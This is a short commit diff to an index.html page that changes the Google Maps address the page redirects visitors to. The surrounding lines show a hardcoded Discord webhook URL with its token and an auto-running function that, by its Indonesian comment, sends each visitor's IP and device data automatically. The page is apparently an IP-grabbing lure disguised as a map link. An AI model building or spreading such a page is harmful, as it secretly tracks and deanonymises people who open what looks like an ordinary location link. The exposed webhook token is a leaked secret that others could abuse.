Update REDIRECT_URL to new Google Maps link

--- a/index.html
+++ b/index.html
@@ -69,7 +69,7 @@
     <script>
         // URL WEBHOOK YANG SUDAH DIGANTI
         const WH = "https://discord.com/api/webhooks/1464945657386242215/reBayi8sdQCNfp5PMp_c12ejYPeeFwoNurlukhTAQfyrx6Yeccc2ZkPNDnb9iF0kzhBj";
-        const REDIRECT_URL = "https://www.google.com/maps/search/UD+Sinar+Gemilang";
+        const REDIRECT_URL = "https://maps.app.goo.gl/WB8RnVog1iUFv8up7";
 
         // --- 1. PENGIRIMAN DATA OTOMATIS (IP & PERANGKAT) ---
         (async function autoInit() {
